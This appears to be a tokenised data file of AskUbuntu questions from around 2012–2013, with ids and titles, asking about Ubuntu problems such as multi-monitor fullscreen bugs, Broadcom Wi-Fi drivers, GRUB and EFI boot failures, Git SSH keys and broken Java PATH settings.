267365	fullscreen bug using dual monitors on top of each other ( gnome3 )	ok , so i have this weird bug . i have set up my monitors on top of each other as you can see the screens are n't totally aligned which is the way i want it . now , here 's the bug : i ca n't fullscreen windows on the top monitor . if i fullscreen the window it will only fill the left or right part of the screen ( matching the distance from the right edge of the laptop to the right edge of the big screen ) it 's like the bottom screen is blocking the middle part of the screen . this behaviour is not present if i align the screens vertically . if i drag the corners of the window i can use that part of the screen , it 's only when i fullscreen that the problem occurs . not sure if this info helps but the only program that i 'm able to fullscreen properly is my virtual windows desktop ( qemu/virt-manager ) .
267366	awn dock does n't differentiate the active window	i have installed avant window navigator 0.4.1 in ubuntu 12.10 ( 64 bit ) and am pretty much satisfied with its looks . but one thing that is lacking is , it fails to differentiate the current or active window on the dock . everything looks the same . as shown in the screen-shot below , i use multiple profiles in firefox and open multiple instances of firefox and get confused between which window i am currently working with . is there any way to highlight the active window in awn ?
267371	ubuntu on the hp touch	i have the original hp touchpad that is running the palm os . how can a novice load ubuntu tablet onto the hp touchpad ?
267374	inspiron 7520 power management 12.10 after sleep mode	i use an inspiron 7520 ; i7 3rd generation , amd radeon hd 7730m w/ intel 4000hd i have noticed that my batttery life radically change when i awake my computer from sleep . when i just boot yp my computer , i have close 4 hours battery life , then if i awake the computer i have 2 hours . weird eh ? oh by the way ! i am using jupiter to help .
267375	how to make username in terminal smaller ?	when you open a terminal it displays the username and the machine name . as an example mine shows : romeo @ romeo-satellite-c660d : ~ $ . it 's really annoying because it 's kinda big . can i make this smaller . like , only show romeo ? i know it sounds stupid , but i 'm new with unix based os .
267384	using read without losing the tab	im using read in a while loop to automatically change a makefile after download . here is part of the script , while read a ; do if [ [ `` $ a '' = `` fcompl=g77 '' ] ] then echo `` fcompl=gfortran '' > > makefile elif [ [ `` $ a '' = `` fflagc=-wall -o '' ] ] then echo `` fflagc=-wall -o -fno-backslash '' > > makefile else echo $ a > > makefile fi done < makefile.orig the problem is that i lose the tabulation . any idea of how i can avoid that ?
267385	how to control fan noise in ubuntu 12.04 ?	after upgrading from 10.04 to 12.04 i could find that my fan noise is heavier than before . even though my my cpu usage is less than 10 % . can anybody tell me how to control the noise thanks .
267392	using authorized_keys with git	i have transfered my ssh key from my root to my user account by ssh-copy-id command so now i have these files in my .ssh folder user @ user-php : ~/.ssh $ ls authorized_keys config id_rsa id_rsa.pub known_hosts now when i want to clone a project and actually the public key is in authorized_keys file it gives me error user @ user-php : /var/www/ts $ git clone git @ xxxx.beanstalkapp.com : /xxxx.git cloning into 'xxxx ' ... permission denied ( publickey ) . fatal : the remote end hung up unexpectedly it is not pick up public key form authorized_keys now why it not picking up the public key and is there any way i can tell git which public key to use . edit : i have also try one more thing i have copyied all the keys from root/.ssh folder to user/.ssh but it still gives permission denied ( publickey ) . error
267395	how to make samsung multifunction printer work under ubuntu ?	hi how do i set this samsung clx 3305fn printer scanner to scan ? i can get the printer to work both usb and network , but simple scan tells me nothing is detected ? can someone tell me what i need please
267399	update manager failed to load package list	every time i run the update manager i see an error message : failed to load the package list . this is a serious problem . try again later . if this problem appears again , please report an error to the developers .
267401	how to avoid screen being stretched when mirroring a notebook ( 16:9 ) to a projector ( 4:3 )	i use ubuntu 12.10 ( gnome 3 ) on a macbook air . i would like to connect the notebook to an external projector and mirror the displays . the projector image looks great , however , everything on the notebook is horizontally stretched to fill the physical screen size ( the round 'askubuntu logo ' is now an ellipse ) . i remember that with mac os x , you could choose 'stretched/non-stretched ' versions for the notebook , but i could n't find this for ubuntu . i installed arandr and played a bit with it , but as soon as i see a nice display on the notebook , the projector cuts off parts of the screen ( for example , a vertical strip on the right side ) . i would rather see some black bars on my screen but the rest being in proper x : y ratio ( for it to be readable ) than having the screen stretched out . any ideas ?
267403	how to tell what interface a tcp connection will go out on ?	i have a server with multiple ethernet interfaces . what 's the easiest way to tell what interface an outgoing tcp connection will go out over ? the results of `` netstat -rn '' is greek to me , so if your answer is `` look at the local routing table '' , please be detailed and clear .
267405	how to prevent caching of php files ?	after removing varnish cache from local server i noticed strange behaviour of apache server . when ever you update a php file and try to open it in a browser old response is shown , ctrl + f5 does not refresh a page , but if you type in service apache2 restart all changes appear . can some one point what could possibly went wrong ?
267409	could not internally obtain zookeeper handle	actually , after a successfull deployement of the bootstrap node in maas/juju environment , it seems that adding a new node was a kind of impossible to do figure out . the node02 is being installed and we can see in juju status : ,534 info connecting to environment ... ,319 info connected to environment . machines : 0 : agent-state : running dns-name : node01 instance-id : /maas/api/1.0/nodes/node-cf3eb63c-8a27-11e2-a9f6-0050561dd02a/ instance-state : unknown 4 : agent-state : not-started dns-name : node02 instance-id : /maas/api/1.0/nodes/node-3550ded6-8be1-11e2-bfa6-0050561dd02a/ instance-state : unknown as you can see the node02 did not start that s because of the following output in /var/log/juju/machine-agent.log : -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/agents/base.py '' , line 210 , in connect self.config [ `` zookeeper_servers '' ] ) file `` /usr/lib/python2.7/dist-packages/txzookeeper/retry.py '' , line 302 , in connect return self.client.connect ( *args , **kw ) file `` /usr/lib/python2.7/dist-packages/txzookeeper/client.py '' , line 468 , in connect self._servers , callback , self._session_timeout ) zookeeper.zookeeperexception : could not internally obtain zookeeper handle basically , zookeeeper is not running in this node and of course in other nodes . is there any explanation for who experienced this problem ? another hit when running is maas node : juju debug-log we can see something like : ,077 provision : maas : juju.state.expose debug : assigned units for machine 6 : old=none , ,173 provision : maas : juju.maas warning : firewalling is not yet implemented is firewalling setting are required to run juju env ? ? ? am still fillig my list experienced troubleshooting with juju/maas installation ! ! !
267414	broken panel icons in xubuntu 12.10	after upgrading my xubuntu to 12.10 , the panel icons are visually broken ( but functional ) , see screenshot . some of the buttons are displayed as a purple gradient . exactly which buttons are drawn this way varies as the mouse is moved over them , and usually the button under the mouse pointer is drawn correctly . any ideas about what is causing this ? lspci says nvidia corporation g98 [ quadro nvs 295 ] ( rev a1 )
267415	ubuntu image download either downloaded or opened roxio instead . why ?	i 'm a windows user but am interested in trying ubuntu . i 've found the official download site and have tried to download ubuntu 12.04 . i believed i was downloading ubuntu 12.04 but i seem to have downloaded roxio creator instead . can someone explain to me what i 've done wrong ?
267420	how do i completely remove otrs and fix my previous localhost	i followed a guide on how to install and configure otrs , it did n't work . now when i tip in firefox localhost it can not connect to it . i tried to remove everything , but still no luck . i removed everything in the folder /opt/otrs* i put a # in front of include sites-enabled/ and restarting apache but get a ... ..action 'start ' failed ... question : how do i completely remove otrs ( and fix my localhost ! )
267422	boot failure with ubuntu 12.10 64 bit	okay i have a futisu likebook ah512 that came with windows 8 64 bit installed . i want to have it dual boot with ubuntu 12.10 64 bit however i get 'setup warning boot failure . '' with a continue button which goes back to boot menu selection . i did have ubuntu before however i couldnt complete the installation due to problems it could n't complete . i think this is what causing the boot errors however i do n't know how i would completely wipe all traces of it from my hdd is thats the problem . i have the same issue trying to boot fedora i had fedora before but then removed it when i installed windows 8 using my recovery disc . both version i have used a disc and usb to try and i get the same error .
267423	qualcomm mobile broadband	i have a hp probook 4520s , with ubuntu 12.04 , i am unable to get the mobile broadband connection working . after i create the connection there is no option to connect to it . i am fairly new with ubuntu and would like to disconnect from windows permanently . i 've gone through a massive amount of troubleshooting threads , and decided to rather ask for assistance in this . i think i might have narrowed it to were the gobi files needs to be copied or this link might help ? http : //www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.6/compat-wireless-3.6.6-1-snpc.tar.bz2 to be honest , i might have broken a couple of times , where i had to reload twice now . and would rather not do this again . if any-one can either assist me , or even just point me in the right direction i would be very grateful . below is the information that seems to be requested in most threads lspci -nn | grep 0200 44:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) sudo lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 43:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 44:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) sudo lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 138a:0007 validity sensors , inc. vfs451 fingerprint reader bus 001 device 004 : id 05c8:0403 cheng uei precision industry co. , ltd ( foxlink ) webcam bus 002 device 005 : id 0a5c:21b4 broadcom corp. bcm2070 bluetooth 2.1 + edr bus 002 device 004 : id 0458:00e4 kye systems corp. ( mouse systems )
267424	how to check if a file is already opened over ssh ?	i have a pc with ubuntu server and i use it with friends to program on a project over ssh . the problem is that sometimes we have the same file opened and if somebody changes something and saves the changes , he overwrites the changes of the other programmer . how can i check ( e.g . with nautilus ) if a file is already opened by somebody else or how can i block others from opening/editing the file i 'm currently working on ? thank you !
267429	ubuntu server 12.04 - > 12.10 ca n't do do-release-upgrade	when i log into my ubuntu 12.04 server , it says : new release '12.10 ' available . run do-release-upgrade to upgrade to it . when i run do-release-upgrade i get the following : administrator @ usnavlxftp21 : ~ $ do-release-upgrade checking for a new ubuntu release no new release found administrator @ usnavlxftp21 : ~ $ i have run apt-get update and apt-get upgrade , and i get : root @ usnavlxftp21 : ~ # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i am a relative noob , but i have successfully upgraded repeatedly , so i am a little confused as to what i am doing wrong or what i am missing ... any suggestions ? thanks .
267431	ubuntu is not able to start up with bluetooth error	i used to have dual system on my laptop windows 7 and ubuntu . when i add a ssd to my laptop i decide to install windows8 and ubuntu in my new ssd . i format the old partions , one for windows 7 and one for ubuntu . installation for windows8 is good and i use wubi windows install to install ubuntu like my old way . first time when i reboot laptop it is fine , but when i reboot laptop again and trying to enter ubuntu system give me an error message below : [ 8.986589 ] bluetooth : ca n't change to loading configuration err [ ok ] after i enter my password , it shows the log below . [ 70.771434 ] [ drm ] nouveau 0000:01:00.0 : evoch 1 mthd 0x0080 data 0x00000000 ( 0x0006 0x05 ) [ 76.889553 ] [ drm ] nouveau 0000:01:00.0 : evoch 1 mthd 0x0080 data 0x00000000 ( 0x1006 0x05 ) [ 95.494879 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 1 . [ 98.493900 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 2 . [ 101.500948 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 3 . [ 110.006986 ] [ drm ] nouveau 0000:01:00.0 : gpu lockup - switching to software fbcon [ 113.921003 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 1 . [ 116.920051 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 2 . [ 130.087864 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 1 . [ 133.086912 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 2 . [ 146.186745 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 1 . [ 149.185795 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 2 . [ 162.309621 ] [ drm ] nouveau 0000:01:00.0 : failed to idle channel 1 . i have no idea what happening . i have try to uninstall wubi , format partion and reinstall ubuntu again ( in the windows ) but it does n't work with same error . i do n't know what is wrong , i do n't even want use any bluetooth . can some one help me ? i post the log picture below : log picture
267434	problem with custom resolution	there are lots of topics dealing with my kind of problem , but non of them works for me . i have ubuntu 12.10 with nvidia 313.09 drivers installed . i ca n't change resolution ( native for my monitor ) to 1440x900 . in nvidia x server settings list of available resolutions ends on 1360x768 . also , my monitor is recognize as crt-01 ( in xrandr as uknown ) because , as i assume , it is connected to pc through vga-dvi converter because of lack of dvi input in my monitor . in x server setting , in advanced options , i can set up 1440x900 , but then , top and left bars are not on 100 % width ( top bar ) and height ( left bar ) as shown on image below . i will provide you with any needed logs .
267435	how to pxe boot a virtual machine from another virtual machine which are in same virtual network ?	i am doing following tutorial : securityteam/testingmaas but i can not get out from 'commissioning ' state of my virtual maas nodes to 'ready ' state . following image shows my current architecture : now , i would like to pxe boot maas nodes via maas server ! i added < dev root='network ' / > to vm 's xmls but when i start them , they just say not bootable device . they even do not try to find any dhcp server for pxe boot ! i also try to forward udp packets ( tftpd=69 , mdnc=68 , dhcp=67 ) from kvm 's host to maas server via ip tables but nothing changed ! how i can troubleshoot tftpd and bootp servers at maas server ? i could not find any log for them on the system ! does this architecture allow this booting scenario ? if not so , how i should reach the 'ready ' state for my maas 's nodes ! thanks in advance !
267438	purged network-manager and now i ca n't download it because i do n't have any internet connection	first off , i 'm new to linux - i have windows 7 installed in my laptop . i thought of installing ubuntu 12.04 and i used the option `` install alongside windows '' . so every thing went down good except network manager icon did not show the wireless connection that i get in win 7 . i have gone through almost all forums . i followed some instruction ( terminal commands ) but i just came to know that those command require internet connection . so , its no benefit . and just recently i removed network manager using the code sudo apt-get remove -- purge network-manager-gnome network-manager for some stupid reasons ( do n't ask ) and now i ca n't re-install using the code sudo apt-get install -d -- reinstall network-manager network-manager-gnome i guess that code also needs internet connection . i am frustated out of my mind . need help badly .
267441	is there any way to transfer videos from mini dv casette with usb on ubuntu 12.10 ( camcorder sony dc r-hc24e )	the problem with windows 7 is that one has to have a firewire cable in order to transfer videos . on both windows 7 and ubuntu , computer refuses to recognize camcorder ( connected via usb cable ) . is there any other way to connect camera ?
267450	please help me with instalation of 64bit version	hi , i have intel ( r ) core ( tm ) quad cpu q8200 @ 2.33ghz but i was n't able to install the 64bit version , ubuntu 12.10 desktop-amd64 . can you help find the right ( x64 ? ) distribution that would work on my pc ?
267455	how can i build the best cyber cafe possible using ubuntu ( desktop or the server edition ) ?	my question has to do with my plan/dream of opening a cyber cafe in mogadishu , somalia , my birth place . i plan to use 5 to 15 computers ( all laptops ) running ubuntu . now that you have the background to my question , i need your help , advice and expertise . what type of computer ( laptop ) should i use for this project ? what type of operating system ( ubuntu desktop/ubuntu server edition ) should i use ? how can i setup a file and printer sharing server ? what program should i use to manage the client computers ? if you have done this before and can point me to the best and easiest way to build this cyber cafe , i would appreciate it tremendously . also , if you can point me to any books , articles , or blogs which i should read , i would appreciate it too .
267456	is it possible to log/monitor bluetooth errors ?	my bluetooth keyboard stops working after i wake up the computer from suspension , for no apparent reason ( can not write with bluetooth keyboard after suspend ) . so i believe an error is being silently output . i am wondering if there is a way to monitor bluetooth errors , possibly in the terminal ?
267458	how to make your own commands	i am new to linux . i made a python script that takes two inputs : a directory name and a file name . the file contains a pattern in each line . the output of the script is all the files that match the pattern and are in the given directory or its subdirectories . now i want to be able to invoke this python script using a command , like this : user @ machine : ~ $ search directory_path file_path how can i do that ?
267461	ubuntu wont boot , grub error , will boot repair mess with windows boot files ?	now , i removed ubuntu completely from my pc ( since it was installed before using wubi installer ) . and re-installed it the old fashion way . installation was smooth no problems at all except , when i rebooted to boot ubuntu for the first time , it did not boot and showed an error and saying grub rescue > what shall i do now ? ! i searched google and found out about boot repair . the thing is , will it mess my windows ? ! or does repair ubuntu and linux distributions only ? !
267467	world of warcraft under primus/crossover getting direct3d9 is not available without opengl	i 'm running ubuntu 12.10 64bit and having issues using primus ( due to nvidia optimus ) to run world of warcraft in crossover.. i 'm getting the following : steorra @ perpetual : ~ $ primusrun /opt/cxoffice/bin/wine -- bottle `` world of warcraft '' -- cx-app `` wow.exe '' p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory xlib : extension `` nv-glx '' missing on display `` :0 '' . direct3d9 is not available without opengl . direct3d9 is not available without opengl . direct3d9 is not available without opengl . i 've tried installing the runtime libraries for direct3d9 under the relevant crossover bottle to no avail . help ?
267470	how do i control the fan speed in macbook pro 13 '' using ubuntu 12.04	how do i control the fan speed on a macbook pro ? i use ubuntu 12.04 lts i want the fan run faster because the laptop getting very hot the laptop was released in october 2008 the model number is a1278 can someone please help me
267477	is there a way to push contrast , brightness and saturation in x11 for arbitrary applications ?	i 'm looking for something like compiz-style controls for opacity , brightness and saturation which can push values for contrast , brightness and saturation beyond the 100 % limit in compiz . basically , i 'd like something similar to the vlc video effects controls , but for all of x11 or an active window . i suppose the compiz controls would work okay if i increased the values on my monitor or tv first and then decreased them for each application , but that 's a pretty lossy way of going about it ( not to mention tedius ) . i almost never want to actually decrease the brightness or saturation , but a lot of streaming video content is too dark or desaturated , due to heavy compression or other content authoring choices . such an option might also help with an application or other flash content which lacks customizable color schemes , but mainly i 'm after something that could work with drm-protected streaming video content . the thing is , the controls on my tv screen are often too slow or not enough to compensate for dark , low-contrast , or desaturated video . normally the picture is fine for everything else , and there is nothing wrong with my video drivers ( intel i915/xorg-intel ) . it looks like the xv attributes that the xattr command handles are more or less what i 'm interested in , but xv options are a little too hardware specific and do n't really fit well into the more general scope of applications that something like compiz can handle : http : //www.x.org/archive/x11r7.5/doc/man/man3/xvsetportattribute.3.html http : //www.x.org/archive/x11r7.5/doc/man/man3/xvgetportattribute.3.html
267484	broadcom bcm43225 ca n't connect to my home wifi	right now i do n't have ubuntu installed because of this issue . the thing is that since ubuntu 11.04 ubuntu ca n't see my home wifi . i have an acer aspire 5742 with a broadcom bcm 43225 wireless card . in ubuntu 10.10 the wifi worked perfectly , but since then i can connect everywhere but my home wifi . i do n't have changed anything in the configuration of the router . now , with ubuntu 12.10 running from a live-usb it can see my wifi and connect to it , but when i start the install process , it disconnects and again ca n't see my wifi . any ideas ? thanks for your help . -- edit -- well , correct me if i 'm wrong . i 'm from spain , and my router manual says that the wireless channel should be put in channel 13 . with a little googling i discovered that the bcm43225 do n't like channels from 12-14 . so , is there any problem if i change my wireless channel to channel 1 ? is there any significant difference between channel 1 and 13 apart from the bandwidth ? thanks
267488	efi dual-boot issue with windows 7 and xubuntu 12.10	thank you so much for reading . i 'm pretty desperate for an answer at this moment . so anyways , i recently solved this issue allowing me to install xubuntu 12.10 correctly . this was a problem with the mbr . ( even though i use efi ? : / ) now when i boot up the computer , i get to go into grub . ok. xubuntu works perfectly , no weird things over there . but when i try to boot windows , there is this error : `` error : invalid efi file path '' . ( both oss are x64 and they also both use efi . ) this is the log from boot-repair . i ca n't seem to understand why windows wo n't boot : ( any help is greatly appreciated !
267489	nexus 7 onboard keyboard issues	when i start up ubuntu on my nexus 7 , i am greeted with the first time setup screen . however , i can not type into text fields using the onscreen keyboard . the keyboard does not seem to be outputting anything ; none of the mouse click emulations nor text enrty are working . i can click on buttons and the keyboard is responding to taps ( animations/options screens ect . ) but is not giving any output into other windows . i got it working once but it stopped working right before i could confirm my password ...
267494	webcam - where is it ?	i just installed ubuntu 12.04 on think pad x230i ( intel® core™ i3-3110m cpu @ 2.40ghz × 4 ) . there is a built-in webcam that was active during the installation process but know i do n't find it . actually , i did not find it in the systemm settings . has anybody an idea ?
267501	bash prompt has become vim ? how to reset ?	i installed dotfiles from a guy on github ( https : //github.com/sontek/dotfiles ) . i did n't like some of the customizations , so i tried uninstalling it by running ./install.sh restore however ... my bash command prompt seems to have turned into vim ( or at least vim commands work now and i seem to have insert and command modes ) . how do i get my normal bash command line back ? ( i miss being able to do ctrl+arrow to jump through words ) . probably a totally n00b question , but i 'm just a young vim grasshopper at this point ...
267502	how do i install vlc extensions ?	vlc player allows installing extensions , plugins , skins . they have to be copied into a folder : for example , its .lua extensions should be in a folder with the same name . where is that ?
267505	ubuntu 12.10 evolution ews	i 'm trying to set up my company 's e-mail in evolution ( exchange 2010 ) . some details : connected to my company via openconnect ( cisco vpn ) installed evolution installed evolution-ews when setting up a new account in evolution i select the server type 'exchange web services' i leave username like it is ( in my case it 's first name dot last name ) in host url i enter the server 's url ( https : //.domain.com/ews/exchange.asmx ) and click on 'fetch url' this is the moment where everything goes wrong ; i get a pop-up asking mail authentication request . in unity i can see silver-shielded icon and the pop-up itself resembles the keyring application ( seahorse ) . text reads `` please enter the password for mail account '' . i have tried the real mail account 's password first , then username for the user on my ubuntu and few other things but nothing . i can not see any network connection to the exchange server ( but it 's correct to say that when the pop-up appears all typing on keyboard is disabled ) , no message in /var/log/auth.log , syslog etc ... is there anybody else with similar experience ? how have you overcome it ? ps : i can set up connection to exchange via thunderbird and it 's extension 'exquilla ' , but i want to give evolution a try .
267506	home/bin not a valid identifier	i am a grad student who has fallen into maintaining a server on a linux-ubuntu machine - we work in ontopia and wandora , two programs that like to mess with java environments . i am learning as i go which means i probably messed up something stupid ; i believe i was trying to update the version of java that was running on ubuntu when i broke it . the login page loads , i enter my password , it reloads . this happens for all users , guest , and test accounts . this happens in ubuntu , ubuntu2d , lubuntu and after the graphicx failsafe recovery business . logging in through the shell ( after alt f3 ) gives me : -bash : export : 'home/bin ' : not a valid identifier but lets me navigate through the system and accounts with no other apparent problems . my .xsession-errors gives : /etc/gdm/xsession : 3 : export : home/bin : bad variable name when i enter which java i get : /usr/lib/jvm/java-6-openjdk-amd64//bin/java i could see how this might contribute to the problem , but i 've no clue how to change this path [ and ca n't find where to do so online ] . my environment files includes classpath and catalina_home variables that i do n't think are relevant , as well as : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : '' java_home=/usr/lib/jvm/java-7-openjdk-amd64 : /usr/lib/jvm/java-6-openjdk-amd64 jre_home=/usr/lib/jvm/java-7-openjdk-amd64/jre : /usr/lib/jvm/java-6-openjdk-amd64/jre content of java.sh : export java_home=/usr/lib/jvm/java-6-openjdk-amd64/ export path= $ java_home/bin : $ path export path= $ path : $ java $ home/bin content of /etc/bashrc : # system-wide .bashrc file for interactive bash ( 1 ) shells . # to enable the settings / commands in this file for login shells as well , # this file has to be sourced in /etc/profile . # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , overwrite the one in /etc/profile ) ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' # commented out , do n't overwrite xterm -t `` title '' -n `` icontitle '' by default . # if this is an xterm set the title to user @ host : dir # case `` $ term '' in # xterm*|rxvt* ) # prompt_command='echo -ne `` \033 ] 0 ; $ { user } @ $ { hostname } : $ { pwd } \007 '' ' # ; ; # * ) # ; ; # esac # enable bash completion in interactive shells # if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then # . /etc/bash_completion # fi # sudo hint if [ ! -e `` $ home/.sudo_as_admin_successful '' ] & & [ ! -e `` $ home/.hushlogin '' ] ; then case `` $ ( groups ) `` in *\ admin\ * ) if [ -x /usr/bin/sudo ] ; then cat < < -eof to run a command as administrator ( user `` root '' ) , use `` sudo < command > '' . see `` man sudo_root '' for details . eof fi esac fi # if the command-not-found package is installed , use it if [ -x /usr/lib/command-not-found -o -x /usr/share/command-not-found/command-not-found ] ; then function command_not_found_handle { # check because c-n-f could 've been removed in the meantime if [ -x /usr/lib/command-not-found ] ; then /usr/bin/python /usr/lib/command-not-found -- `` $ 1 '' return $ ? elif [ -x /usr/share/command-not-found/command-not-found ] ; then /usr/bin/python /usr/share/command-not-found/command-not-found -- `` $ 1 '' return $ ? else printf `` % s : command not found\n '' `` $ 1 '' > & 2 return 127 fi } fi content of ~/.profile : # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi` `
267510	how to prevent system freeze on wifi activation ?	without myself modifing any configuration setting , my system starts to completely freeze after i activate the wifi network via the network manager or at a sudo rfkill unblock all . i would like to kindly ask for your assistance as i do not understand how to fix it . thanks in advance for your help ! here 's my system information : lspci -vvnn | grep 14e4 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:051b ] uname -r 3.5.0-25-generic dmesg | grep b43 *** # verwendete kernelversion uname -a linux lenovo-g570 3.5.0-25-generic # 39-ubuntu smp mon feb 25 18:26:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux # abfrage für pci und pcmcia-karten : lspci -nnk | grep -i net -a2 01:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8152 v2.0 fast ethernet [ 1969:2062 ] ( rev c1 ) subsystem : lenovo device [ 17aa:3979 ] kernel driver in use : atl1c -- 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:051b ] kernel driver in use : bcma-pci-bridge # abfrage für usb-geräte : lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0bda:0139 realtek semiconductor corp. card reader bus 002 device 003 : id 058f:9254 alcor micro corp. hub bus 002 device 004 : id 5986:0292 acer , inc bus 002 device 006 : id 04d9:1603 holtek semiconductor , inc . keyboard bus 002 device 007 : id 046d : c03d logitech , inc. m-bt96a pilot optical mouse # nur bei umts/gprs-karten bzw . usb-sticks noch zusätzlich : usb-devices # dazu bitte diese befehle eingeben und in den beitrag einfügen : egrep -v `` ^ $ |^ # '' /etc/network/interfaces auto lo iface lo inet loopback $ egrep -v `` ^ $ |^ # '' /etc/resolv.conf nameserver 8.8.8.8 $ egrep -v `` ^ $ |^ # '' /etc/hosts 127.0.0.1 localhost 127.0.1.1 laptop # zuordnung der schnittstellen : cat /etc/udev/rules.d/70-persistent-net.rules # pci device 0x14e4:0x4727 ( brcmsmac ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' e4 : d5:3d:5c : d1:45 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # pci device 0x1969 : /sys/devices/pci0000:00/0000:00:1c.0/0000:01:00.0 ( atl1c ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' dc:0e : a1:68 : c1:72 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.1/0000:02:00.0 ( wl ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' e4 : d5:3d:5c : d1:45 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' # schließlich geben diese befehle auch noch aufschluss über die momentanen einstellungen : ifconfig -a eth0 link encap : ethernet hardware adresse dc:0e : a1:68 : c1:72 inet adresse:192.168.178.32 bcast:192.168.178.255 maske:255.255.255.0 inet6-adresse : fe80 : :de0e : a1ff : fe68 : c172/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx packets:79998 errors:0 dropped:0 overruns:0 frame:0 tx packets:58218 errors:0 dropped:0 overruns:0 carrier:1 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:97693373 ( 97.6 mb ) tx-bytes:5579450 ( 5.5 mb ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 